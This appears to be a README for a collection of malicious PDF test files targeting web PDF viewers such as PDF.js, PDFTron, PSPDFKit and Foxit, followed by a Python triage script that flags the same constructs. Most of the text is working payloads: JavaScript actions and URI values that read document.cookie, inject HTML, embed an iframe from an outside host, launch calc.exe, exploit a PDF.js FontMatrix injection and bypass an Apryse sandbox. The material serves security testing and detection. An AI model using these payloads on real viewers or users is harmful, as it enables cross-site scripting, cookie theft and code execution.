A list of crafted malicious PDF files to test the security of PDF readers and tools.
Write-Up: JavaScript-based PDF Viewers, Cross Site Scripting, and PDF files
- Foxit PDF SDK For Web 7.5.0 (~600 weekly downloads)
- PDFTron WebViewer 7.2.0, 7.3.1, 8.6.1, 10.1.0, 10.7.2, 10.12.0 (~87k weekly downloads)
- PSPDFKit for Web 2021.4.1 (~13k weekly downloads)
- Syncfusion ej2-pdfviewer 20.2.40 (~6.8k weekly downloads)
- React PDF viewer 3.6.0 (~34k weekly downloads)
- PDF.js 4.1.392 (~2 million weekly downloads)
Line 31. Understand if Acrobat Javascript APIs are supported.
/JS (app.alert\(1\); Object.getPrototypeOf(function*(){}).constructor = null; ((function*(){}).constructor("document.write('<script>confirm(document.cookie);</script><iframe src=https://14.rs>');"))().next();)
Line 69. Try to run arbitrary Javascript abusing the data URI scheme.
/URI (data:text/html,<script>alert\(2\);</script>)
Line 177. Try to inject Javascript code using annotations.
<</Type /Annot /Rect [284.7745656638 581.6814031126 308.7745656638 605.6814031126 ] /Subtype /Text /M (D:20210402013803+02'00) /C [1 1 0 ] /Popup 15 0 R /T (\">'><details open ontoggle=confirm\(3\)>) /P 6 0 R /Contents (��^@"^@>^@'^@>^@<^@d^@e^@t^@a^@i^@l^@s^@ ^@o^@p^@e^@n^@ ^@o^@n^@t^@o^@g^@g^@l^@e^@=^@c^@o^@n^@f^@i^@r^@m^@\(^@'^@X^@S^@S^@'^@\)^@>) >>
Line 69. Try to run arbitrary Javascript abusing the data URI scheme.
/URI (\">'><details open ontoggle=confirm\(2\)>)
Line 31. Understand if the PDF reader or tool runs arbitrary Javascript bypassing the Acrobat APIs.
/JS (app.alert\(1\); confirm\(2\); prompt\(document.cookie\); document.write\("<iframe src='https://14.rs'>"\);)
Line 69. Try to run remote commands on Windows.
/URI (file:///C:/Windows/system32/calc.exe)
Line 31. Try to run remote commands on Windows by abusing Acrobat Javascript APIs.
/JS (app.alert\(1\); app.openDoc("/C/Windows/System32/calc.exe");)
Line 69. Try to run remote commands on Windows.
/URI (START C:/\Windows/\system32/\calc.exe)
Line 31. Try to run remote commands on Windows by abusing Acrobat Javascript APIs.
/JS (app.alert\(1\); app.launchURL\("START C:/\Windows/\system32/\calc.exe", true\); app.launchURL\("javascript:confirm\(3\);", true\);)
Line 69. Try to run arbitrary Javascript abusing the data URI scheme.
/URI (javascript:confirm\(2\);)
Line 31. Try to run remote commands on Windows by abusing Acrobat Javascript APIs.
/JS (app.alert\(1\); app.launchURL\("/C/Windows/system32/calc.exe", true\); app.launchURL\("'><details open ontoggle=confirm\(3\);", true\);)
Line 50. Try to run arbitrary Javascript injected via annotation. It works on vulnerable Apryse PDF Webviewer versions.
/V (">'></div><details/open/ontoggle=confirm(document.cookie)></details>)
Line 19. Try to run arbitrary Javascript injected via FontMatrix. It works on vulnerable PDF.js versions. Proof-of-Concept created by Rob Wu and Thomas Rinsma.
<< /BaseFont /SNCSTG+CMBX12 /FontDescriptor 6 0 R /FontMatrix [ 1 2 3 4 5 (1\); alert\('origin: '+window.origin+', pdf url: '+\(window.PDFViewerApplication?window.PDFViewerApplication.url:document.URL\)) ] /Subtype /Type1 /Type /Font >>
Line 32. Javascript sandbox bypass in Apryse WebViewer SDK (10.9.x - 10.12.0) to run arbitrary embedded Javascript in PDFs.
/JS (app.alert\(1\); console.println\(delete window\); console.println\(delete confirm\); console.println\(delete document\); window.confirm\(document.cookie\);)
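For triaging uploaded PDFs before they reach a web viewer, the sketch below flags the constructs the test files above exercise: JavaScript actions, `/URI` values outside an allowlist, non-numeric `/FontMatrix` entries, and markup in `/T`, `/V` or `/Contents` strings. It is an added example, not part of this repository; the rule names and sample bytes are constructed, and it assumes uncompressed object bodies (it does not inflate streams or decode hex strings).

```python
import re

ALLOWED_URI = re.compile(rb"(?i)(https?|mailto):")   # allowlist of link schemes
LITERAL = rb"\(((?:\\.|[^\\)])*)"                    # literal string up to first unescaped ')'
FONT_MATRIX = re.compile(rb"/FontMatrix\s*\[([^\]]*)\]")
NUMERIC_ONLY = re.compile(rb"[\s\d.+\-]*")
MARKUP = re.compile(rb"/(?:T|V|Contents)\s*\((?:\\.|[^\\)])*?<\s*[A-Za-z/]")


def triage(pdf: bytes) -> list[str]:
    """Return the names of the rules that fire on raw PDF bytes."""
    # Crude normalisation: dropping NULs lets ASCII patterns match UTF-16BE strings.
    data = pdf.replace(b"\x00", b"")
    findings = []
    # Any JavaScript action is worth a look in a document meant for a web viewer.
    if re.search(rb"/(?:JS|JavaScript)(?![A-Za-z0-9])", data):
        findings.append("javascript-action")
    # Link targets must start with an allowlisted scheme; everything else is flagged.
    uris = re.finditer(rb"/URI\s*" + LITERAL, data)
    if any(not ALLOWED_URI.match(m.group(1)) for m in uris):
        findings.append("uri-scheme-not-allowlisted")
    # A font matrix is six numbers; strings or names inside it are not legitimate.
    if any(not NUMERIC_ONLY.fullmatch(m.group(1)) for m in FONT_MATRIX.finditer(data)):
        findings.append("fontmatrix-non-numeric")
    # HTML-looking tags in annotation titles, contents or field values.
    if MARKUP.search(data):
        findings.append("markup-in-annotation-string")
    return findings


# Constructed samples (not taken from the test files above).
CLEAN = (b"<< /Type /Annot /Subtype /Link /A << /S /URI /URI (https://example.com/doc) >> >>\n"
         b"<< /Type /Font /FontMatrix [0.001 0 0 0.001 0 0] >>\n"
         b"<< /T (Reviewer) /Contents (Looks good) >>")
SUSPICIOUS = (b"<< /S /JavaScript /JS (app.alert\\(1\\);) >>\n"
              b"<< /S /URI /URI (javascript:void\\(0\\)) >>\n"
              b"<< /Type /Font /FontMatrix [1 0 0 1 0 (x)] >>\n"
              b"<< /T (<b onmouseover=x>) >>")
UTF16_NOTE = b"<< /Contents (\xfe\xff" + "<details open>".encode("utf-16-be") + b") >>"

if __name__ == "__main__":
    for name, sample in (("clean", CLEAN), ("suspicious", SUSPICIOUS), ("utf16", UTF16_NOTE)):
        print(name, triage(sample))
```

A hit means the file needs review or sanitising, not that it is malicious; an empty result says nothing about content inside compressed streams.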